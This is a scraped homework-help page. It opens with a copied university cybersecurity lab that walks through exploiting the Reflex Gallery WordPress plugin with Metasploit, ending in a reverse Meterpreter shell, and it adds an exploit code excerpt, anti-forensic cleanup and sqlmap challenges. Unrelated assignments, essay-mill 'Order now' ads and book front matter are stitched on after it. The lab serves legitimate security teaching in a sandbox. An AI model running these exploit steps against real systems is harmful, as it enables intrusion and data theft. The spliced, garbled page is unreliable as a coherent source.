Cyber Security: Kali Linux Lab homework

11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses

https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 1/13

Last week, we started working with Vagrant and WPDistillery, running WordPress and Kali in separate VMs, and using the  wpscan  tool to probe an older version of WordPress for weaknesses…and exploit them. Hopefully, you were able to find some interesting exploits to understand how the types of vulnerabilities we looked at over the first six weeks, such as XSS and SQLI, actually work in the wild.

This is only the beginning, though. As proofs-of-concept, many specific web vulnerabilities like XSS only require a simple demonstration, such as a harmless javascript  alert  or some minor modification to an HTML page. Like a single link in a chain, they aren’t very interesting in isolation, but when combined with other links, these vulnerabilities can be wielded to great effect. Like martial arts students, we begin with the rudiments — simple moves, both attacks and blocks — before we can understand how these are combined into a repertoire of skills.

In practice, the offensive goal is usually achieving the highest level of access possible. The defensive goal is, if not to block the attack outright, to at least contain the damage by limiting the attacker’s access. Nobody plans for their user database to get stolen, but one still hashes and salts passwords anyway,

Week 8 Lab Exercises: WordPress vs. Kali, Round 2

 

 

11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses

https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 2/13

because pwning happens. This week, we’re going to look at how specific exploits become full-blown attacks — and what can be done to stop them.

This week’s lab builds on the previous one in that we’ll be using the previous WP/Kali setup via Vagrant/VirtualBox. We’ll cover some of the same steps again, but refer to last week’s instructions if you need more of a refresher.

First, you’ll need to make sure you have the VirtualBox VMs setup in the same way as last week’s lab:

Running in VirtualBox Logged into desktop

Provisioned via Vagrant / WPDistillery Running version 4.2

If you are running a version other than 4.2 or if you break your WordPress server during an exploit, you can destroy the current WP instance and remove web content:

Linux and macOS

cd $HOME/WPDistillery vagrant destroy –force

Enter password for sudo if asked then delete WordPress content.

rm -rf public

Windows PowerShell (As Administrator)

cd $HOME\WPDistillery vagrant destroy –force Remove-Item -Recurse -Force .\public\

All Hosts

Edit  wpdistillery/config.yml  and change the following value:

# WordPress version wpversion: 4.2

Start it back up.

vagrant up

Saving Progress:  Whenever you need a break from hacking WordPress, you can gracefully shutdownWhenever you need a break from hacking WordPress, you can gracefully shutdown the server usingthe server using   vagrant halt . Whenever you wish to resume, use. Whenever you wish to resume, use   vagrant up   to start the server.to start the server. Make sure you are in the WPDistillery directory when entering the commandsMake sure you are in the WPDistillery directory when entering the commands (Hint:(Hint:   cd $HOME/WPDistillery ).).

Milestone 0: Preparing the Playing Field

Kali VM

WordPress VM

 

 

11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses

https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 3/13

Before going further, shutdown the WordPress server usingBefore going further, shutdown the WordPress server using   vagrant halt   on the command line andon the command line and shutdown the Kali VM using either its own shutdown menu or through VirtualBox Manager.shutdown the Kali VM using either its own shutdown menu or through VirtualBox Manager.

There’s one more step required for this lab. Because VirtualBox places specific networking restrictions on VMs, we need to configure VirtualBox to allow communication between the Kali VM and the WordPress VM in order to execute a more sophisticated attack.

First, you need to determine the host-only adapter used by the WPDistillery VM. In the VirtualBox client, click one the WPDistillery VM so its information is displayed in the detail pain, and then look at the details under Network. Two adapters should be listed: one “NAT” and one “Host-Only Adapter” with a qualifier like  vboxnet0  — that is the host-only network in use, so make a note of it.

Next, you’ll need to setup a DHCP server for that network — this will allow automatic assignments of IP addresses. Go to the Host Network Manager in VirtualBox (via the File menu). When the Host Network Manager dialog comes up:

Bug Alerts:  Deleting and re-creating the host-only adapter during step 1 (below) is necessary in orderDeleting and re-creating the host-only adapter during step 1 (below) is necessary in order for Kali to pull an IP from the DHCP server later on. Otherwise DHCP will offer IPs in thefor Kali to pull an IP from the DHCP server later on. Otherwise DHCP will offer IPs in the 192.168.56.0/24 network instead of 192.168.33.0/24. On macOS you may have to re-apply changes192.168.56.0/24 network instead of 192.168.33.0/24. On macOS you may have to re-apply changes twice when setting up DHCP, double-check the numbers before closing the dialog.twice when setting up DHCP, double-check the numbers before closing the dialog.

1. Highlight the host-only network you indentified in the previous step and delete it and then re-create it, then click on the Properties button at the top of the dialog.

2. When the nested dialog appears, click on DHCP Server tab and set the following fields: ☑ Enable Server Server Address:  192.168.33.2 Server Mask:  255.255.255.0 Lower Address Bound:  192.168.33.100 Upper Address Bound:  192.168.33.200

Click Apply and Close to apply these changes and exit. Restart the WPDistillery VM using the command line ( vagrant up ) and confirm the WordPress site is still accessible via  wpdistillery.vm .

Now, back in the VirtualBox client, click on the Kali VM. If it is running, power it down (right-click on the VM, Close >> Power Off). Then in the Kali VM settings (right-click on the VM, Settings), add a second adapter pointing to the same host-only network:

1. Click on Network 2. Click on Adapter 2 and set the following fields:

☑ Enable Network Adapter Attached to:  Host-only Adapter Name: specify the host-only adapter modified in the previous step

3. Click OK 4. Start the Kali VM (right-click on the VM, Start >> Normal Start) 5. Open a terminal and run the following command to remove the default network profiles and reboot Kali

In Kali Terminal, run:  sudo rm /etc/NetworkManager/system-connections/* ; sudo reboot

Open a Hole

 

 

11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses

https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 4/13

6. After Kali reboots, log back in and confirm that you have 3 interfaces output in Kali Terminal by opening a Terminal and running  ip addr :

lo (loopback) with IP address of 127.0.0.1 eth0 (NAT) with IP similar to 10.x.x.x eth1 (Host-only) with IP of 192.168.33.100

7. Verify connectivity to your WordPress server and the Internet from Kali. ping google.com ping wpdistillery.vm  or  ping 192.168.33.10

End the pings with  Ctrl  +  C

If the setup was successful, both Kali and WordPress should have access to 2 networks now. One is used for Internet access in order to facilitate downloading of WordPress plugins and Kali attack tools. The other network doesn’t have Internet access, but is only a network of the VM’s that are connected to it. This latter network is the one that’ll be used as a safe sandbox for practicing our exploits.

Our first victim is a WordPress plugin for displaying image galleries called Reflex Gallery.

1. In the WP admin console, go to Plugins -> Add New 2. Search for  reflex gallery  and you should see ReFlex Gallery » WordPress Photo Gallery 3. Click on the result but don’t install the plugin yet. Look at the Changelog tab for any critical security

issues that were patched and install the version just before it was patched. 4. On the right side of the dialog, where it lists the compatibility and installs data, click the WordPress.org

Plugin Page » link 5. You’ll be taken to the official WP plugin page. Click on the  Development  tab 6. Click Advanced View 7. Under Previous Versions, download the 3.1.3 zip file 8. In the WordPress admin console, go to Plugins -> Add New -> Upload Plugin, specify the zip file you

downloaded, then click Install Now 9. Go to admin console plugins page, find the plugin, and click Activate

Challenge: Beyond activating the plugin, you need to use it in a page or a post on the WP instance. Create a gallery and use it in a page before proceeding

Milestone 1: Opening an Attack Surface

 

 

11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses

https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 5/13

The following steps should be run in the Kali VM’s Terminal emulator So we know the blog is accessible from the host OS and Kali VM at  wpdistillery.vm , which is simply a local IP aliased via the  /etc/hosts  file. Let’s re-run wpscan against the URL:

wpscan –url http://wpdistillery.vm –random-agent

The output should include the vulnerability associated with Reflex Gallery:

Arbitrary File Upload. Sounds promising. At this point, we could dig in, research the source code, come up with a carefully-crafted demonstration of the specific, underlying exploit. But instead of that, let’s just go right for the throat and attack this with a sledgehammer.

Metasploit is an exploitation framework. One of the most popular tools in Kali, it’s the free part of a larger, commercial project used widely in web security penetration testing. And by hackers. If wpscan is a dental pick, Metasploit is a set of carving knives.

Metasploit currently has over 1600 exploits, organized in different categories like:

Browser-based: a large collection of (mostly) remote code execution exploits Mobile: Android, iOS OS-specific: Linux, Windows, Solaris, etc. Combinations of the above

Metasploit currently has hundreds of payloads. Some of them are:

Command shells, enabling attackers to run scripts or arbitrary commands against a host Meterpreter payloads, enabling attackers to control the screen of a device using VNC and to browse, upload and download files Dynamic payloads, enabling attackers to evade anti-virus defenses by generating unique payloads

For this attack, we’ll be using Meterpreter to open a shell into the target machine. Read more about Meterpreter here

Metasploit uses a database to manage exploit/payload information and also attack data. So you need to initialize the DB, then load the console:

sudo service postgresql start sudo msfdb init msfconsole

[!] Title: Reflex Gallery <= 3.1.3 – Arbitrary File Upload Reference: https://wpvulndb.com/vulnerabilities/7867 Reference: http://packetstormsecurity.com/files/130845/ Reference: http://packetstormsecurity.com/files/131515/ Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4133 Reference: https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_reflexgallery_file_ Reference: https://www.exploit-db.com/exploits/36374/ [i] Fixed in: 3.1.4

Milestone 2: Recon

Milestone 3: Hello, Metasploit

 

 

11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses

https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 6/13

Fun fact: you get different ASCII art every time. And they say hackers don’t care about UX. Note the command prompt has changed to  msf5 > . You are now in a shell within another shell within a VM.

In the snippets below, the  >  character denotes the end of the prompt (similar to how  $  is used to denote a non-root user’s bash prompt). For example,  msf5 >  is the MSF prompt. The commands to enter will follow the  >  in most of the examples below.

First check that the DB is connected OK. The DB isn’t strictly necessary but MSF runs faster with it.

msf5 > db_status [*] Connected to msf. Connection type: postgresql.

Now we’re ready.

In MSF, start by searching the exploit database for something related to the plugin affected by the vulnerability. You could search on several different terms to find something, but in this case, the plugin has an unusual word in its name, “Reflex”

Enter  search Reflex  into MSF:

Well, that sure looks handy. It’s even ranked excellent, which should suggest to you that not all of these tools are created equal. Some work better than others; some don’t work at all. In fact, what follows may not work perfectly for you, so don’t be too surprised if it doesn’t go swimmingly. These are hacks, after all: user- supported code and scripts whose primary purpose is to compromise systems, so robustness isn’t exactly a guarantee. Give it a shot, but be prepared for some possible difficulty ahead.

The command to use the exploit is unsurprisingly called  use  and takes the exploit’s name as an argument. Once loaded, the command prompt changes again, and you can run the  info command.

msf5 > use exploit/unix/webapp/wp_reflexgallery_file_upload [*] No payload configured, defaulting to php/meterpreter/reverse_tcp msf5 exploit(wp_reflexgallery_file_upload) > info

Notice the output lists the affected version and some options we’ll need to set:

msf5 > search Reflex [!] Module database cache not built yet, using slow search

Matching Modules ================

Name Disclosure Date Rank Descriptio —- ————— —- ———– exploit/unix/webapp/wp_reflexgallery_file_upload 2012-12-30 excellent WordPress

Milestone 4: Pwnage

 

 

11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses

https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 7/13

Use the  set  command to specify  RHOST  accordingly. If your blog isn’t hosted at the root ( / ), you could additionally pass in the path by setting  TARGETURI  (but the WpDistillery setup should work with the default).

msf5 exploit(wp_reflexgallery_file_upload) > set RHOST wpdistillery.vm RHOST => wpdistillery.vm

Before we can run the exploit, we need to specify the  LHOST  i.e. which IP address should Kali (localhost) receive a shell on. The default might be in the NAT network in which cause the exploit will work but no session will be opened. To ensure that we get a shell back on the host-only adapter’s IP address, we will set it explicitly.

msf5 exploit(unix/webapp/wp_reflexgallery_file_upload) > set LHOST 192.168.33.100 LHOST => 192.168.33.100

You can probably guess the command used to finally run the exploit (it’ll take a minute to run):

Available targets: Id Name — —- 0 Reflex Gallery 3.1.3

Check supported: Yes

Basic options: Name Current Setting Required Description —- ————— ——– ———– Proxies no A proxy chain of format type:host:port[,type:host:p RHOSTS yes The target host(s), range CIDR identifier, or hosts RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes The base path to the wordpress application VHOST no HTTP server virtual host

Payload information:

Description: This module exploits an arbitrary PHP code upload in the WordPress Reflex Gallery version 3.1.3. The vulnerability allows for arbitrary file upload and remote code execution.

msf5 exploit(unix/webapp/wp_reflexgallery_file_upload) > exploit

[*] Started reverse TCP handler on 192.168.33.100:4444 [+] Our payload is at: mcxgHJixsWZpS.php. Calling payload… [*] Calling payload… [*] Sending stage (38288 bytes) to 192.168.33.10 [*] Meterpreter session 1 opened (192.168.33.100:4444 -> 192.168.33.10:51778) at 2020-10-11 [+] Deleted mcxgHJixsWZpS.php

meterpreter >

 

 

11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses

https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 8/13

Having problems? See the Troubleshooting section at the end of this milestone Notice the command prompt changed to  meterpreter > . The meterpreter payload ( mcxgHJixsWZpS.php ) was uploaded, executed, then deleted (just like campers, hackers should leave no trace), and now we have a connection to the target machine. Run the  shell  command when you see the  meterpreter >  prompt to load a new shell:

meterpreter > shell Process 5315 created. Channel 0 created.

A shell within a shell within a shell. But this shell is different; this shell is running on the WordPress VM. In case it’s not clear, you really shouldn’t be able to do that. Notice the new shell spawned by Meterpreter doesn’t bother with command prompts at all, so it might just look like nothing’s happening after the process and channel are created. Try running some commands, like  whoami and  pwd :

whoami www-data pwd /var/www/public/wp-content/uploads/2020/10 echo $PATH /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin exit meterpreter >

Lines 2, 4, and 6 in above snippet are output. It’s a low-fi shell, and somewhat limited, but it works, and it’s enough to compromise the whole machine. We can see we’re shell’d in as the  www-data  user and presently in one of the wordpress upload directories, which is where the malicious PHP payload was delivered.

The  exit  command on line 7 above gets us back to the  meterpreter >  prompt, which has fewer but more useable commands than the shell. For instance, we can poke around with  pwd ,  cd ,  ls , and  cat :

 

 

11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses

https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 9/13

meterpreter > pwd /var/www/html/wp-content/uploads/2017/03 meterpreter > cd ../../.. meterpreter > pwd /var/www/html/wp-content meterpreter > ls Listing: /var/www/html/wp-content =================================

Mode Size Type Last modified Name —- —- —- ————- —- 100644/rw-r–r– 29 fil 2017-03-18 19:01:59 +0000 index.php 40755/rwxr-xr-x 4096 dir 2017-03-18 01:13:31 +0000 plugins 40755/rwxr-xr-x 4096 dir 2017-03-16 20:06:21 +0000 themes 40755/rwxr-xr-x 4096 dir 2017-03-18 01:13:31 +0000 upgrade 40755/rwxr-xr-x 4096 dir 2017-03-18 01:13:31 +0000 uploads

meterpreter > cat index.php <?php // Silence is golden.

Meterpreter may fail to establish a connection after running  exploit  in Metasploit. This might be a one- off error, but if you can’t get it to work, here are a few alternatives you can try:

The whole setup can be simplified by bypassing the Kali VM and simply installing Metasploit to your host machine and running the same instructions from within Metasploit on your host machine. We don’t recommend this approach unless the above doesn’t work for you, for the simple reason that it’s not a great idea to install hacking tools on to your host system. By having things like Metasploit and vulnerable WordPress versions contained within VMs, any risks can be compartmentalized and easily cleaned up. That said, there’s nothing especially dangerous about installing Metasploit to your host system, but if you do install it, we’d recommend you remove it after the course is done.

As an alternative workaround to the above that still uses the Kali VM, you can setup port-forwarding through localhost. In VirtualBox, stop your Kali VM, open its Settings, and under Network, disable Adapter 2 (as created in Milestone 0), then switch back to Adapter 1 and click Port Forwarding. Click the Add button at right and use the following settings:

Name:  metasploit Protocol:  TCP Host IP:  127.0.0.1 Host Port:  4444 Guest IP: (leave blank) Guest Port:  4444

Click OK and retstart Kali. Then, in Metasploit, load the exploit (via  use ), set  LHOST  to your host PC’s IP address (not the VM IP) and  LPORT  to  4444 , then try  exploit  again.

Troubleshooting

Milestone 5: Tag it

 

 

11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses

https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 10/13

Challenge: Make a change to the WP content. You can open a  vi  editor from  meterpreter > using the  edit <file>  command. Use this to alter one of the PHP files in some subtle, tasteful way. For example:

Meterpreter Cheat Sheet

And that’s pretty much game over for this scenario. Once an attacker is able to gain this level of access, a whole universe of options suddenly opens up. If the machine is configured appropriately, those options may be limited, but this is not a position any sysadmin wants be in, even with everything configured perfectly. In the best case scenario, the attack surface available to the intruder is intolerably large.

Congratulations: at this point, you are officially a script kiddie. Hopefully this has given you a sense of the power of these tools, how even a single, specific exploit affecting some random plugin can be weaponized in a way that’s frighteningly easy to use. In the above example, we just compromised the whole system, so it’s tempting to feel like there’s some real skill involved in what we’re doing here. But we’re standing on the shoulders of giants. Just go back and read more about Meterpreter:

“…an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.”

Now writing something like that takes real skill. Remember, everything available in Kali has been used extensively by others. Many of these kinds of tools started out as someone’s secret weapon of choice and gradually filtered out into the public domain. That’s not to say Kali isn’t powerful or even dangerous (it is). But the most effective, advanced attacks and tools in use today certainly aren’t bundled in Kali.

Nobody wants to be a script kiddie, and, sadly, in-memory DLL injection is beyond the scope of our skills at this point, but we can at least look at the exploit we just used and understand it. The link to the announcement and code for this exploit is actually listed as part of the  wpscan  output from Milestone 2 (rapid7 is the company that sells the commercial version of Metasploit). From there, you can get to the code for this exploit in Github. It’s written in Ruby. Don’t know Ruby? Doesn’t matter. Let’s look anyway:

Badge Earned: Script Kiddie

Milestone 6: Going Deeper

 

 

11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses

https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 11/13

require ‘msf/core’

class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking

include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Exploit::FileDropper

This is the  class  declaration of the module and associated  require  /  include  statements pulling in the required parts of MSF. Lines 11 and 12 show the payload and its delivery mechanism are just components of MSF.

Line 47 shows how the filename of the dropped payload is created randomly, and lines 49 – 51 show how the MIME attachment is created and how the encoded  payload  is added to it as a binary data stream, which is serialized as a string for the  POST  request.

And here’s the multipart upload  POST  request, which just mimics what the browser sends to the WordPress server when the user uploads a file. The plugin accepts the binary content just as it would for an image. Note the  uri  value contains the components of the path to the vulnerable source in the plugin.

if res.code == 200 && res.body =~ /success|#{php_pagename}/ print_good(“Our payload is at: #{php_pagename}. Calling payload…”) register_files_for_cleanup(php_pagename)

If the response code is OK, the module marks the uploaded file for cleanup, which happens immediately after the next step. The payload is deleted so obvious forensic evidence of the hack isn’t left on the target server.

Finally, the payload is activated via another HTTP request, which opens the Meterpreter connection.

def exploit php_pagename = rand_text_alpha(8 + rand(8)) + ‘.php’

data = Rex::MIME::Message.new data.add_part(payload.encoded, ‘application/octet-stream’, nil, “form-data; name=\”qqfi post_data = data.to_s

res = send_request_cgi({ ‘uri’ => normalize_uri(wordpress_url_plugins, ‘reflex-gallery’, ‘admin’, ‘script ‘method’ => ‘POST’, ‘vars_get’ => { ‘Year’ => “#{year}”, ‘Month’ => “#{month}” }, ‘ctype’ => “multipart/form-data; boundary=#{data.bound}”, ‘data’ => post_data })

send_request_cgi( ‘uri’ => normalize_uri(wordpress_url_wp_content, ‘uploads’, “#{year}”, “#{month )

 

 

11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses

https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 12/13

One takeaway from this is that the framework, MSF, is doing all the heavy lifting here: the payload is provided (even in encoded form), activating it is a single function call, and even the cleanup is provided as a core function. All the author had to do here was create and issue a multipart  POST request.

Challenge: Now that we’ve walked through the exploit, go back to the Reflex Gallery plugin code and identify the fix — specifically, what was changed in the plugin code to prevent this attack?

Hints:

The plugin is written in PHP and Javascript — which part would this fix need be in, and why? Use the source browser changelog viewer to diff specific commits If you ran the MSF exploit agains the fixed version of the plugin, what specifically would fail? Two files related to the vulnerability were substantially changed between the two versions

If you think back to all of the Security Shepherd exercises around SQL injection, you probably noticed that finding the right combination of characters and expressions to use would very often boil down to trial and error, educated guesswork, and sometimes dumb luck. Being a coder, you may have thought it’d be nice to have a tool that automates all that guessing and testing. Say hello to our little friend  sqlmap , which does exactly that: given a URL and a parameter string, this tool will attempt to identify SQLI-vulnerable parameters by systematically trying various SQLI exploits — pretty much all of them — and if it finds the right way in, it can exfiltrate an entire database.

As such, one of the tricks to using  sqlmap  is knowing how not to use it. In the wrong hands, it becomes an accidental load-testing tool, firing off thousands of requests from multiple threads and crashing a database. In the right hands, it can identify novel routes for exploitation.

Read the usage docs on this one. In addition to the standard parameters, make sure you understand  threads ,  risk , and  level  that allow throttling and control how aggressively the tool will run. Try different verbosity settings to see what it’s actually doing under the hood.

Challenge: Examine this writeup about a recent SQLI vulnerability in a WP plugin. Follow the same process as before to identify the affected version from the changelog, install it manually, then recreate the exploit described in the writeup using  sqlmap  and confirm the researcher’s results.

Hints:

Actually read the usage docs Expect issues, be patient.  sqlmap  is basically hammering your WP VM, which isn’t designed to handle a heavy load. Look at the output carefully, even if there’s an error. Does it match the original findings? To see what it’s doing, try running with high verbosity ( -vvvv ). Try  CTRL-C  and  (S)skip  if something seems to hangs When in doubt, accept the default.

Milestone 7: Hello,  sqlmap

 

 

11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses

https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 13/13

 
Do you need a similar assignment done for you from scratch? Order now!
Use Discount Code "Newclient" for a 15% Discount!

How To Work On A Spreed Sheet Document Using The Information Given Assignment Help

Improve It Project 3-7

Windows   Mac

Central Sierra Insurance is a multi-office company that handles commercial and personal insurance products. In this project, you add missing data and verify that the charts are updated.

[Student Learning Outcomes 3.2, 3.3, 3.4]

File Needed: CentralSierra-03.xlsx (Available from the Start File link.)

Completed Project File Name: [your name]-CentralSierra-03.xlsx

Skills Covered in This Project

  • Edit source data.
  • Switch row and column data.
  • Change chart colors.
  • Apply a chart style.
  • Add and format elements in a chart.
  • Use gradient fill for a chart object.
  • Change the chart type.

Alternate Instruction for Microsoft 365 Apps icon This image appears when a project instruction has changed to accommodate an update to Microsoft 365 Apps. If the instruction does not match your version of Office, try using the alternate instruction instead.

  1. Open CentralSierra-03.xlsx the start file workbook. The start file will be renamed automatically to include your name. Change the file name if directed to do so by your instructor and save it.
  2. Insert a new row at row 8.
  3. Type Motorcycle in cell A8. In cells B8:D8, type these values: 15, 82, and 24.
  4. Change the pie chart object to a 3-D Pie and apply Style 3. Notice that a data series for “Motorcycle” has been added.
  5. Switch the row and column data for the column chart. The data series for “Motorcycle” is not included.
  6. Click the Select Data button [Chart Design tab, Data group] and reset the source data to show cells A5:D10.
    Alternate Instruction for Microsoft 365 Apps iconClick the Select Data button [Chart Tools Design tab, Data group] and reset the source data to show cells A5:D10.
  7. Change the column chart color scheme to Monochromatic Palette 7 in the Monochromatic group.
  8. Format chart elements.Figure 3-76a Excel 3-7 Linear Down gradientFigure 3-76a Linear Down gradient
    1. Select the Side Wall of the column chart and apply Olive Green, Accent 3 shape fill (seventh column).
    2. Use the Shape Fill button to apply the Linear Down gradient in the Light Variations group to the side wall (Figure 3-76a).
    3. Apply the same fill and gradient to the Walls element.
    4. Select the Floor element and apply Olive Green, Accent 3, Lighter 60% (seventh column) with no gradient.
    5. Select the gridlines and use the Shape Outline button to format them with Black, Text 1, Lighter 50% (second column). (To select the gridlines, select the Plot Area and then click one of the gridlines in the chart.)
  9. Select the pie chart object and change the colors to Monochromatic Palette 7 in the Monochromatic group.
  10. Use Olive Green, Accent 3 as shape fill (seventh column) for the pie chart area with a Linear Down gradient from the light variations.
  11. Apply a 1 pt Olive Green, Accent 3, Darker 25% outline (seventh column) to both chart objects.
  12. Save and close the workbook (Figure 3-76).
  13. Upload and save your project file.
  14. Submit project for grading.
 
Do you need a similar assignment done for you from scratch? Order now!
Use Discount Code "Newclient" for a 15% Discount!

Programming Language assignment

Programming Language assignment

Kim 4

Textbook Assignment 2 : Introduction

1. Question 3.2. In Fortan 77, local variables were typically allocated statically. In Algol and its descendants (e.g., Ada and C), they are typically allocated in the stack. In Lisp they are typically allocated at least partially in the heap. What accounts for these differences? Give an example of a program in Ada or C that would not work correctly if local variables were allocated statically. Give and example of a program in Scheme or Common Lisp that would not work correctly if local variables were allocated on the stack.

2. Question 3.4. Give three concrete examples drawn from programming languages with which you are familiar in which a variable is live but not in scope.

3. Question 3.5. Consider the following pseudocode: Suppose this was code for a language with the declaration-order rules of C(but with nested subroutines) – that is, names must be declared before use, and the scope of a name extends from its declaration through the end of the block. At each print statement, indicate which declarations of a and b are in the referencing environment. What does the program print (or will the compiler identify static semantic errors)? Repeat the exercise for the declaration-order rules of C# (names must be declared before use, but the scope of a name is the entire block in which it is declared) and of Modula-3 (names can be declared in any order, and their scope is the entire block in which they are declared).

 

 

4. Question 3.7. A part of the development team at MumbleTech.com, Janet has written a list manipulation library for C that contains, among other things, the code in Figure 3.16.

a. Accustomed to Java, new team member Brad includes the following code in the main loop of his program: Sadly, after running for a while, Brad’s program always runs out of memory and crashes. Explain what’s going wrong.

b. After Janet patiently explains the problem to him, Brad gives it another try: This seems to solve the insufficient memory problem, but where the program used to produce correct results (before running out of memory), now its output is strangely corrupted, and Brad goes back to Janet for advice. What will she tell him this time?

5. Question 3.14. Consider the following pseudocode: What does this program print if the language uses static scoping? What does it print with dynamic scoping? Why?

 

6. Question 3.18. Consider the following pseudocode: Assume that the language uses dynamic scoping. What does the program print if the language uses shallow binding? What does it print with deep binding? Why?

 
Do you need a similar assignment done for you from scratch? Order now!
Use Discount Code "Newclient" for a 15% Discount!

Big Data Assignment Help

Big Data Assignment Help

Compare and contrast five clustering algorithms on your own. Provide real-world examples to explain any one of the clustering algorithm. In other words, how is an algorithm beneficial for a process, industry or organization.

What clustering Algorithms are good for big data? Explain your rationale?

Please locate and review an article relevant to Chapter 4. The review is between 200-to-250 words and should summarize the article. Please include how it applies to our topic, and why you found it interesting.

– Please write in APA Style and include at least three (3) reputable sources. (No Plagiarism)

 
Do you need a similar assignment done for you from scratch? Order now!
Use Discount Code "Newclient" for a 15% Discount!

Computer Science homework help

Computer Science homework help

[ Team Unknown ]

 

Agile Project Management: Creating Innovative Products, Second Edition By

Jim Highsmith

……………………………………….. Publisher: Addison-Wesley Professional Pub Date: July 10, 2009 Print ISBN-10: 0-321-65839-6 Print ISBN-13: 978-0-32165839-5 Web ISBN-10: 0-321-65920-1 Web ISBN-13: 978-0-32165920-0 Pages: 432 Slots: 1.0

Table of Contents | Index

Copyright Praise for Jim Highsmith’s Agile Project Management, Second Edition Praise for Jim Highsmith’s Agile Project Management The Agile Software Development Series Acknowledgments About the Author Foreword Preface

Introduction

Conventions The Agile Software Development Series

Chapter 1.

The Agile Revolution

 

 

Agile Business Objectives Agility Defined Agile Leadership Values Agile Performance Measurement The APM Framework Performance Possibilities Final Thoughts

Chapter 2.

Value over Constraints

Continuous Flow of Customer Value Iterative, Feature-Based Delivery Technical Excellence Simplicity Final Thoughts

Chapter 3.

Teams over Tasks

Leading Teams Building Self-Organizing (Self-Disciplined) Teams Encourage Collaboration No More Self-Organizing Teams? Final Thoughts

Chapter 4.

Adapting over Conforming

The Science of Adaptation Exploring Responding to Change Product, Process, People Barriers or Opportunities Reliable, Not Repeatable Reflection and Retrospective Principles to Practices Final Thoughts

Chapter 5.

 

 

An Agile Project Management Model

An Agile Enterprise Framework An Agile Delivery Framework An Expanded Agile Delivery Framework Final Thoughts

Chapter 6.

The Envision Phase

A Releasable Product Envisioning Practices Product Vision Project Objectives and Constraints Project Community Final Thoughts

Chapter 7.

The Speculate Phase

Speculating on Product and Project Product Backlog Release Planning Final Thoughts

Chapter 8.

Advanced Release Planning

Release (Project) Planning Wish-based Planning (Balancing Capacity and Demand) Multi-Level Planning Capabilities Value Point Analysis Release Planning Topics Emerging Practices Final Thoughts

Chapter 9.

The Explore Phase

 

 

Agile Project Leadership Iteration Planning and Monitoring Technical Practices Coaching and Team Development Participatory Decision Making Collaboration and Coordination Final Thoughts

Chapter 10.

The Adapt and Close Phases

Adapt Product, Project, and Team Review and Adaptive Action Close Final Thoughts

Chapter 11.

Scaling Agile Projects

The Scaling Challenge An Agile Scaling Model Building Large Agile Teams Scaling Up—Agile Practices Scaling Out—Distributed Projects Final Thoughts

Chapter 12.

Governing Agile Projects

Portfolio Governance Portfolio Management Topics Final Thoughts

Chapter 13.

Beyond Scope, Schedule, and Cost: Measuring Agile Performance

What Is Quality? Planning and Measuring Measurement Concepts

 

 

Outcome Performance Metrics Output Performance Metrics

Shortening the Tail Final Thoughts

Chapter 14.

Reliable Innovation

The Changing Face of New Product Development Agile People and Processes Deliver Agile Products Reliable Innovation The Value-Adding Project Leader Final Thoughts

Bibliography

Index

 

 

Agile Computing Software Engineering Jim Highsmith Addison-Wesley Professional Agile Project Management: Creating Innovative Products, Second Edition

 

 

Copyright Many of the designations used by manufacturers and sellers to distinguish their products are claimed as trademarks. Where those designations appear in this book, and the publisher was aware of a trademark claim, the designations have been printed with initial capital letters or in all capitals.

The author and publisher have taken care in the preparation of this book, but make no expressed or implied warranty of any kind and assume no responsibility for errors or omissions. No liability is assumed for incidental or consequential damages in connection with or arising out of the use of the information or programs contained herein.

The publisher offers excellent discounts on this book when ordered in quantity for bulk purchases or special sales, which may include electronic versions and/or custom covers and content particular to your business, training goals, marketing focus, and branding interests. For more information, please contact:

U.S. Corporate and Government Sales (800) 382-3419 corpsales@pearsontechgroup.com

For sales outside the United States please contact:

International Sales international@pearsoned.com

Library of Congress Cataloging-in-Publication Data

Highsmith, James A., 1945- Agile project management : creating innovative products / Jim Highsmith. p. cm. Includes bibliographical references and index. ISBN-13: 978-0-321-65839-5 (pbk. : alk. paper) ISBN-10: 0-321-65839-6 (pbk. : alk. paper) 1. Software engineering. 2. Agile software development–Management. I. Title. QA76.758.H54 2010 005.1–dc22

2009019147

Editor-in-Chief Karen Gettman

Executive Editor Chris Guzikowski

 

 

Senior Development Editor Chris Zahn

Managing Editor Patrick Kanouse

Project Editor Mandie Frank

Copy Editor Margo Catts

Indexer Tim Wright

Proofreader Kathy Ruiz

Publishing Coordinator Raina Chrobak

Cover Designer Louisa Adair

Compositor Mark Shirar

Copyright © 2010 Pearson Education, Inc.

